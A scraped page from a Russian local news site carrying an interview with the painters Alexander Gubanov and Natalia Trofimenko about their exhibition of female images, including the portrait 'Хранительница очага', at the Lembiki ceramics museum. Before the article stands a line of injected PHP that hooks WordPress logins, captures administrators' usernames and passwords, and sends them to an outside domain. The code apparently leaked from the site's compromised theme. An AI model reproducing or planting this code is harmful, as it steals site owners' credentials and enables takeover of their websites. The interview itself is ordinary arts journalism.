if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Индейка, хранительница очага, другие личности женского пола, и кое-что из Вырицы — Гатчинка.рф
Home » N.B! Тема » Индейка, хранительница очага, другие личности женского пола, и кое-что из Вырицы
Наталья Трофименко и Александр Губанов

Индейка, хранительница очага, другие личности женского пола, и кое-что из Вырицы

В Музее керамики «Лембики» вырицкие дачники, жители Петербурга  Александр Губанов и Наталья Трофименко, одну за одной проводят выставки, которые не посещать просто неприлично: настолько привлекательным и «раскрученным» местом в художественных кругах северной столицы стала Малая Садовая, 4.

 Фигура хорошая есть у многих, а такого таланта и такой одежды нет ни у кого, так Александр отвечает на мою «претензию» по поводу того, что он на портрете жены скрыл под ярким объёмным нарядом всю прелесть красивого стройного тела.

Это не первый опыт портрета Наташи, но вот так, чтобы в полный рост… вообще замысел начался с рамы. Эту усадебную раму конца XIX века нам подарили друзья. Здесь сочетается простой дуб и золочение: таким образом подчёркивается близость к природе и роскошь. Картины в такие рамы помещали в усадебных домах. Рама это как одежда для картины, она очень многое делает. Кстати, обрамлять современное искусство старинными «окладами» начали ещё в эпоху импрессионистов. Можно встретить картину какого-нибудь импрессиониста в барочной раме и это смотрится очень круто. Когда нам досталась такая великолепная рама, я решил писать что-то значительное. И поскольку очень люблю цвет, попросил Наташу надеть красное кимоно, а сверху тоже красную накидку, которую она сшила: кстати, из вырицкого гобелена. Получился такой яркий образ красное на красном, как у Малявина или Архипова.

Портрет Натальи Трофименко

Мы с Александром Губановым обсуждаем картину на выставке, которая называется «Хранительница очага». Полотно занимает центральное место в зале, своими размерами, внушительной рамой и безудержно яркой палитрой сразу приковывает внимание посетителей и не оставляет сомнения, что это и есть хранительница очага.

В данном случае Наташа хранительница нашего очага, но есть ещё «хранительница очага» как вообще женский символ, объясняет Александр, показывая на картину куда более скромную по размерам и цветовой гамме.

Хранительница очага

Хранительница очага

Покидать «частную» хранительницу в пользу «общей» не хочется, поскольку недоразгаданы все символы и коды этой вызывающе яркой работы. Тем более, что поговорить можно не только с художником, но и с моделью.

Наталья традиционно эклектично-стильная охотно демонстрирует то самое кимоно с картины, сняв его с манекена, стоящего в углу зала. Надев и раскинув руки, становится похожа на экзотическую птицу в алом оперении.

Наталья Трофименко

— На картине обстановка вашего дома?

Да, здесь много предметов, реально существующих в нашем доме. Стол,  ваза и стул: вот он, сейчас здесь на выставке, отвечает Наталья.

Александр дополняет:

Главное здесь выражение лица. То, которое Наташа «носит» дома. Все привыкли, что она очень эмоциональная, а здесь, в домашней обстановке, она остановилась, у неё очень спокойное лицо и созерцательное настроение. Дома Наташа такая и есть. Но при этом символично, что смотрит она на волчок, который стабилен и гармоничен только когда он движется. Стремление к постоянному движению в этом вся Наташа. Я давно хотел написать волчок, и здесь он пришёлся как раз кстати.

Несмотря на то, что и автор, и модель в своём стремительном движении ищут, и, наверняка, находят стабильность, есть в этой картине деталь, которая говорит о зыбкости и непостоянстве окружающего нас мира стена, в сторону которой повёрнута героиня.

Это написано в новой технике, которую я придумал. Она такая зыбкая, как рябь на воде или телевизионные помехи. Тоненькой кисточкой делаешь такие штрихи туда-сюда, туда-обратно. Технику я назвал реципрокатизм («реципрок» взаимный. Прим. ред.). По принципу: импрессионизм, пуантилизм, лучизм, как у Ларионова. Решил приобщиться к великим. (Улыбается.) У меня есть картина, полностью написанная в этой технике, проба пера.

Реципрокатизм

Реципрокатизм

— Образы, символы, яркие пятна… Всё так насыщенно, что лицо на портрете Наташи «проходит мимо». То, почему Вы скрыли от нас фигуру, мы уже обсудили. Но и на лице почти не задерживаешь внимание, стараясь охватить все детали.

— Здесь надо смотреть на образ целиком, потому что лицо в данном случае не так важно. Мне хотелось, чтобы был узнаваем образ яркого человека, художника, который создаёт яркую интересную одежду. Я вообще изначально хотел делать какое-то абстрактное лицо, вообще неузнаваемое. При этом, глядя на картину, все должны  понимать это Наташа.

Но у Вас на выставке всё же есть женщина с общим выражением лица, а, вернее, совсем без лица. Та самая «Хранительница очага».

Она  без лица специально. Здесь, как в древних обереговых куклах. Им лиц не рисовали, чтобы в них не вселялись злые духи. У меня на картине это такая обереговая кукла. У неё на коленях символ дома со спиралью, которая является символом мироздания.  В картине зашифровано много разных смыслов. Рождалась картина постепенно. Сначала был просто пейзаж, который виден из окна нашего вырицкого дома. Потом уже появился собирательный женский образ.

Я присматриваюсь к золотому диску в правом верхнем углу, который вполне мог бы быть солнцем, если бы в центре картины уже не было месяца и звезды. Хотя, почему и не солнце? В описании к выставке ясно сказано: «Многие работы напоминают коллажи из разных образов, собранных воедино в причудливых композициях».

Под определённым углом на диске виден оттиск, растолковывает Александр, наблюдая, как я увлеклась разглядыванием солнца-несолнца.

Я нашёл старую вологодскую прялку, на которой вот эти солярные символы, которые часто используются в народных орнаментах. А у меня ещё и дедушка из вологодской Тотьмы. Всё это так собралось в единый родовой символ-оберег.

— Почему на одной картине и солнце, и месяц?

Это очень интересно. В месяце и звёздочке зашифрована дата написания картины. Я запечатлел редкое астрономическое явление, случившееся 3 января 2025 года: в этот день Венера максимально близко подошла к Луне.  Мы как раз после Нового года были в Вырице, гуляли, и видели, как совсем близко Венера стояла над месяцем. А Венера это тоже сложно-женский символ. И это всё легло в одну копилку к образам «Хранительницы очага».

Ещё одну «хранительницу», с таким же домиком на коленях, я рассмотрела на полотне, две трети которого залиты брусничным соусом заката, на котором половинкой яичного желтка круглится солнце.

Хранительница на фоне красного неба

Да, хранительница очага перекочевала вот на эту картину. Но на первой картине она за забором, охраняя свой дом; там только есть окошко в другой мир. А здесь она охраняет всё, что вокруг неё. Красное небо символизирует тревогу, но присутствие хранительницы делает наш мир спокойнее, менее опасным и тревожным.

На картинах Александра Губанова нет привычных аншлагов. Рассказывая о работах, он говорит их названия, а вот для фантазии посетителей выставки он предпочитает не делать преград. «Названия зависят от контекста той или иной выставки, на которой представлена работа. Образы рождаются в процессе создания картины и трансформируются по мере её «жизни» в реальности. Большинство картин пишутся без чёткого понимания результата, тем самым храня тайну своего смысла и от художника, и от зрителя до последнего прикосновения кисти. Всегда очень интересна реакция и интерпретация получившейся работы зрителями. Я постоянно узнаю что-то новое о своих картинах», это из вступительной статьи к выставке.

Например, эта работа Александр показывает на картину, сделанную как будто в технике эрбу (ну, знаете, такие разводы по воде). Это моя любимая работа, потому что она получилась спонтанно. Когда она была готова, я рассмотрел вот эту фигуру в капюшоне, с глазом, с носом, изо рта какие-то огненные струи. Потом я добавил вот эти вращающиеся элементы: как будто всё в движении, всё бурлит, всё циркулирует, крутится. Какие-то стрелы падают. Это вообще какой-то символ чуть ли не апокалипсиса… Если я картине дам такое название, то и Вы начнёте искать признаки конца света…

HT7pmORWae9CDLMMvZA77FC526B4azjQptnBVae2evmfsovulUnEXIPZNpyLSD9J_nHd9vGFBsDsRes-dKnoLoC6

— А мне вообще кажется, что это «Весна идёт, весне дорогу!»

Вот видите! Я недавно разговаривал с одним художником. Тоже абстракционистом, умудрённым ему под 80. Он сказал, что никогда не ставит названия. Потому что это сразу огрничивает человеческую фантазию.

Вы говорите, что увидели здесь кого-то в капюшоне. Этот кто-то  женщина?

Да, есть такая богиня-воительница в древнеиндийской мифологии Дурга. Одна из самых популярных богинь в индуизме, сражающаяся с демонами, защитница богов и мирового порядка (имя богини переводится как «та, что не знает поражения», известна также под именами: Парвати («горная»), Кали («чёрная»), Бхайрави («страшная»). Прим. ред.).

— Всего час побыла на Вашей выставке, а уже чувствую себя искусствоведом. Вижу, что на этой картине старинная рама, и выглядит работа значительно, несмотря на то, что изображение простенькое, хотя, и не очень понятное. 

Вы правы: это такая быстрая работа была, но в раме начала XX века она смотрится значительно. И эта глубина рамы даёт эффекn иконы. Кстати, картина называется «Богиня-улитка», Наташа её так назвала из-за такого причудливого головного убора в виде улитки. И, кажется, в какой-то мифологии действительно есть такая богиня (в мифологии индейцев майя есть  Бог-Улитка, это старейшее божество пантеона майя, которое считается одной из версий великого прапредка. Прим. ред.).

Что за зверь у неё на руках?

Возможно, это наш лембик. (Смеётся.) Такой вот смешной зверь. (Лембики  сосуды для вина в виде животных, зооморфные сосуды. Прим. ред.)

Богиня-Улитка

Богиня-Улитка

Кстати, у Вас здесь немало довольно смешных работ. Ну, вот взять эту «Индейку». Одна из немногих картин, у которой есть название.

Да, здесь нужно было подчеркнуть игру слов. У меня есть картина, которая называется «Штраус», там изображён страус с головой Штрауса. Я подумал, что будет забавно из индианки сделать индейку, нарисовав ей голову этой птицы.

— Можно назвать её хранительницей индейского очага?

Вполне!

Индейка

Индейка

— Однако, не на всех картинах я рассмотрела кого-нибудь, кто бы хоть отдалённо напоминал женщину. Ну, вот здесь, как ни крути, кроме дерева ничего не вижу.

А здесь кроме вырицкого дуба и сиверских девонских песков больше ничего и нет. (Улыбается.). Это реальное место, оно находится недалеко от усадьбы Елисеевых в Белогорке. Мы там гуляли зимой и небо было такое кустодиевское разноцветное, похожее на северное сияние. Мне захотелось, чтобы на этом ярком фоне был мощный раскидистый дуб, который я видел в Вырице. Ну, я его и перенёс сюда. (Смеётся.) Вам не нравится?

Вырицкий дуб в Сиверской

Вырицкий дуб в Сиверской

— Нет, почему же… Дуб хорош, и небо великолепно и девонские пески, пробивающиеся сквозь снег, — что надо…но ведь ни один сиверчанин или выричанин не признает этот пейзаж своим, хотя, всё вроде писано с натуры…  Ну, хорошо, давайте ещё одну картину обсудим, на которой я не нашла женских образов. Вот эту, с кораблём. Я бы даже сказала — с крейсером «Авророй».

Смысл этой картины пришёл уже позже, когда я её нарисовал. Я недавно прочитал «Час быка» нашего замечательного вырицкого писателя Ивана Ефремова, и я понял, что это очень похоже. Небо совершенно космическое, с радугой и встающим над ней солнцем, которое я написал по мотивам рисунка космонавта Алексея Леонова. Слева это не штрих-код, а зашифрованный инопланетный сигнал. Получилось как иллюстрация к этой книге. («Час Быка»  социально-философский научно-фантастический роман-антиутопия. Люди из далёкого будущего, жители коммунистической Земли, путешествуют на звездолёте на планету Торманс. Здесь звездолётчики обнаруживают потомков людей, ранее бежавших с Земли и построивших закрытое тоталитарное общество. Прим. ред.)

Действительно, очень похоже. Интересно, если бы Вы мне не рассказали об этом, что бы я сама могла придумать? На этом, пожалуй, остановимся: я доставлю себе удовольствие на тему других картин пофантазировать, не получая Ваших комментариев.

Что-то похожее на "Час Быка"

Что-то похожее на «Час Быка»

Пока мы беседовали с Александром, Наталья терпеливо слушала, хотя по всему было видно, что ей хотелось говорить, комментировать, вставлять реплики. Но ей хватает такта, несмотря на свою яркость и подвижность, держаться так, чтобы солнце «славы» освещало их с мужем равномерно.

Наташа, Вы, как человек лучше всех знающий Сашу как художника, что скажете: достаточно такого небольшого количества картин, чтобы он смог рассказать о себе зрителям? 

Думаю, да. Здесь кроме работ, собранных по основной теме выставки, есть и природа, и абстракция, и даже картина, написанная  в новой технике.

Он молодец! Мне всё его творчество нравится. Когда он начал писать мой портрет, я подумала: чтобы он ни написал, я всё поддержу. Мешать не буду. Но потом всё же мы немного поспорили по поводу моего лица. Немного подбородок уменьшили, потом я говорю: у меня нет горбинки на носу! А он говорит: нет, у тебя есть. Лицо у меня было очень тёмное, убедила его немного высветлить.

Рука Наташи

Рука Наташи

— Вы ощущаете себя Сашиной музой?

Да, ощущаю. И это приятно. Когда Саша начал писать этот портрет, был вечер, я уже хотела спать ложиться, была такая сонная. А он говорит: иди переоденься, надень вот эту накидку, потом ещё одну, и ещё. Надел на меня шляпу, перчатки, перстень, поставил стул. По-моему, получилось очень хорошо. Я довольна. И ножка у меня получилась такая маленькая, как будто 35-го размера, хотя у меня нога большая.

Потому что я на тебя смотрю как бы сверху, я немного над тобой завис.  Такой ракурс, объясняет художник музе.

И я решила сменить ракурс и, как бы зависнув над Сашей и Наташей, посмотреть на них сверху.

По модельному высокая и длинноногая, эмоционально-распахнутая, смелая в одежде до хулиганства, постоянно балансирующая между стилем и перебором. Кажется, ещё чуть-чуть, и этот вихрь из многослойных юбок, стеклярусного  кокошника, немыслимой цветастой куртки подавит собой сдержанность серого пиджака и умеренно-клетчатой ковбойки. Нет, ну, подождите, разве можно голыми руками взять парня в зелёных джинсах и ботинках с принтом картины Клода Моне? Его и в ажурных перчатках с крупным рубином на пальце так просто не возьмёшь. Он, как говорится, ещё тот «фрукт». Одним словом, всё  у этих ребят хорошо. Думается, они не дают друг другу скучать. И умело подзаводят один другого,  чтобы быть гармоничными и равновесными как волчок в движении.

Ботинки Саши

Ботинки Саши

Алёна РЫБАКОВА

Фото: Сергей КОВАЧЕВ

Альбом с фотографиями: https://vk.com/album-29998172_307612332 

 

More 263 posts in N.B! Тема
Recommended for you
Иван Балашов
Пятнадцать лет и 100 дней Ивана Балашова

(далее…)